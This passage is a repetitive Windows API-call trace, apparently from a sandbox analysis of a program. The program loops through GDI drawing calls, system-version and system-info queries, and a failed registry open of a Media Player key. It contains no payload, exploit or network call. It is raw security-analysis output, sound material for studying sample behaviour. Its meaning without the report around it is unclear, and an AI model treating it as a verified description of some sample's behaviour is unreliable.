lppt=0x0) returned 0 [0088.125] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.125] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.125] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.125] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401d3 [0088.125] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401d6 [0088.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee5 [0088.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee6 [0088.125] CombineRgn (hrgnDst=0x1040ee5, hrgnSrc1=0x60401d3, hrgnSrc2=0x40401d6, iMode=1) returned 1 [0088.125] CombineRgn (hrgnDst=0x1040ee6, hrgnSrc1=0x60401d3, hrgnSrc2=0x40401d6, iMode=4) returned 2 [0088.125] CreateSolidBrush (color=0xff) returned 0x2100ee4 [0088.125] CreateSolidBrush (color=0xff0000) returned 0x1100ee7 [0088.125] DeleteObject (ho=0x1100ee7) returned 1 [0088.125] DeleteObject (ho=0x40401d6) returned 1 [0088.125] DeleteObject (ho=0x60401d3) returned 1 [0088.125] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.125] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.125] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.125] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.125] BeginPath (hdc=0x0) returned 0 [0088.125] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.125] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.125] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.125] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.126] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401d6 [0088.126] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401d3 [0088.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee8 [0088.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee9 [0088.126] CombineRgn (hrgnDst=0x1040ee8, hrgnSrc1=0x50401d6, hrgnSrc2=0x70401d3, iMode=1) returned 1 [0088.126] CombineRgn (hrgnDst=0x1040ee9, hrgnSrc1=0x50401d6, hrgnSrc2=0x70401d3, iMode=4) returned 2 [0088.126] CreateSolidBrush (color=0xff) returned 0x2100ee7 [0088.126] CreateSolidBrush (color=0xff0000) returned 0x1100eea [0088.126] DeleteObject (ho=0x1100eea) returned 1 [0088.126] DeleteObject (ho=0x70401d3) returned 1 [0088.126] DeleteObject (ho=0x50401d6) returned 1 [0088.126] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.126] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.126] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.126] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.126] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.126] BeginPath (hdc=0x0) returned 0 [0088.126] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.126] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.126] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.126] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.126] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.126] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.126] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.126] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401d3 [0088.126] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401d6 [0088.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eeb [0088.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eec [0088.126] CombineRgn (hrgnDst=0x1040eeb, hrgnSrc1=0x80401d3, hrgnSrc2=0x60401d6, iMode=1) returned 1 [0088.126] CombineRgn (hrgnDst=0x1040eec, hrgnSrc1=0x80401d3, hrgnSrc2=0x60401d6, iMode=4) returned 2 [0088.126] CreateSolidBrush (color=0xff) returned 0x2100eea [0088.126] CreateSolidBrush (color=0xff0000) returned 0x1100eed [0088.126] DeleteObject (ho=0x1100eed) returned 1 [0088.126] DeleteObject (ho=0x60401d6) returned 1 [0088.126] DeleteObject (ho=0x80401d3) returned 1 [0088.126] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.126] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.127] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.127] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.127] BeginPath (hdc=0x0) returned 0 [0088.127] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.127] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.127] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.127] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.127] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401d6 [0088.127] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401d3 [0088.127] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eee [0088.127] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eef [0088.127] CombineRgn (hrgnDst=0x1040eee, hrgnSrc1=0x70401d6, hrgnSrc2=0x90401d3, iMode=1) returned 1 [0088.127] CombineRgn (hrgnDst=0x1040eef, hrgnSrc1=0x70401d6, hrgnSrc2=0x90401d3, iMode=4) returned 2 [0088.127] CreateSolidBrush (color=0xff) returned 0x2100eed [0088.127] CreateSolidBrush (color=0xff0000) returned 0x1100ef0 [0088.127] DeleteObject (ho=0x1100ef0) returned 1 [0088.127] DeleteObject (ho=0x90401d3) returned 1 [0088.127] DeleteObject (ho=0x70401d6) returned 1 [0088.127] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.127] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.127] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.127] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.127] BeginPath (hdc=0x0) returned 0 [0088.127] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.127] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.127] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.127] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.128] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401d3 [0088.128] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401d6 [0088.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef1 [0088.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef2 [0088.128] CombineRgn (hrgnDst=0x1040ef1, hrgnSrc1=0xa0401d3, hrgnSrc2=0x80401d6, iMode=1) returned 1 [0088.128] CombineRgn (hrgnDst=0x1040ef2, hrgnSrc1=0xa0401d3, hrgnSrc2=0x80401d6, iMode=4) returned 2 [0088.128] CreateSolidBrush (color=0xff) returned 0x2100ef0 [0088.128] CreateSolidBrush (color=0xff0000) returned 0x1100ef3 [0088.128] DeleteObject (ho=0x1100ef3) returned 1 [0088.128] DeleteObject (ho=0x80401d6) returned 1 [0088.128] DeleteObject (ho=0xa0401d3) returned 1 [0088.128] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.128] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.128] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.128] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.128] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.128] BeginPath (hdc=0x0) returned 0 [0088.128] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.128] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.128] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.128] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.128] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.128] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.128] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.128] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401d6 [0088.128] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401d3 [0088.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef4 [0088.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef5 [0088.128] CombineRgn (hrgnDst=0x1040ef4, hrgnSrc1=0x90401d6, hrgnSrc2=0xb0401d3, iMode=1) returned 1 [0088.128] CombineRgn (hrgnDst=0x1040ef5, hrgnSrc1=0x90401d6, hrgnSrc2=0xb0401d3, iMode=4) returned 2 [0088.128] CreateSolidBrush (color=0xff) returned 0x2100ef3 [0088.128] CreateSolidBrush (color=0xff0000) returned 0x1100ef6 [0088.128] DeleteObject (ho=0x1100ef6) returned 1 [0088.128] DeleteObject (ho=0xb0401d3) returned 1 [0088.128] DeleteObject (ho=0x90401d6) returned 1 [0088.128] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.128] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.128] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.129] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.129] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.129] BeginPath (hdc=0x0) returned 0 [0088.129] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.129] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.129] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.129] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.129] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.129] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401d3 [0088.129] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401d6 [0088.129] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef7 [0088.129] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ef8 [0088.129] CombineRgn (hrgnDst=0x1040ef7, hrgnSrc1=0xc0401d3, hrgnSrc2=0xa0401d6, iMode=1) returned 1 [0088.129] CombineRgn (hrgnDst=0x1040ef8, hrgnSrc1=0xc0401d3, hrgnSrc2=0xa0401d6, iMode=4) returned 2 [0088.129] CreateSolidBrush (color=0xff) returned 0x2100ef6 [0088.129] CreateSolidBrush (color=0xff0000) returned 0x1100ef9 [0088.129] DeleteObject (ho=0x1100ef9) returned 1 [0088.129] DeleteObject (ho=0xa0401d6) returned 1 [0088.129] DeleteObject (ho=0xc0401d3) returned 1 [0088.129] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.129] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.129] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.129] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.129] BeginPath (hdc=0x0) returned 0 [0088.129] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.129] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.129] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.130] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.130] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401d6 [0088.130] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401d3 [0088.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040efa [0088.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040efb [0088.130] CombineRgn (hrgnDst=0x1040efa, hrgnSrc1=0xb0401d6, hrgnSrc2=0xd0401d3, iMode=1) returned 1 [0088.130] CombineRgn (hrgnDst=0x1040efb, hrgnSrc1=0xb0401d6, hrgnSrc2=0xd0401d3, iMode=4) returned 2 [0088.130] CreateSolidBrush (color=0xff) returned 0x2100ef9 [0088.130] CreateSolidBrush (color=0xff0000) returned 0x1100efc [0088.130] DeleteObject (ho=0x1100efc) returned 1 [0088.130] DeleteObject (ho=0xd0401d3) returned 1 [0088.130] DeleteObject (ho=0xb0401d6) returned 1 [0088.130] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.130] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.130] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.130] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.130] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.130] BeginPath (hdc=0x0) returned 0 [0088.130] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.130] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.130] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.130] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.130] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.130] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.130] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.130] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401d3 [0088.130] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401d6 [0088.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040efd [0088.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040efe [0088.131] CombineRgn (hrgnDst=0x1040efd, hrgnSrc1=0xe0401d3, hrgnSrc2=0xc0401d6, iMode=1) returned 1 [0088.131] CombineRgn (hrgnDst=0x1040efe, hrgnSrc1=0xe0401d3, hrgnSrc2=0xc0401d6, iMode=4) returned 2 [0088.131] CreateSolidBrush (color=0xff) returned 0x2100efc [0088.131] CreateSolidBrush (color=0xff0000) returned 0x1100eff [0088.131] DeleteObject (ho=0x1100eff) returned 1 [0088.131] DeleteObject (ho=0xc0401d6) returned 1 [0088.131] DeleteObject (ho=0xe0401d3) returned 1 [0088.131] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.131] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.131] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.131] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.131] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.131] BeginPath (hdc=0x0) returned 0 [0088.131] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.131] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.131] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.131] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.131] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.131] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.131] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.131] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.131] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401d6 [0088.131] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 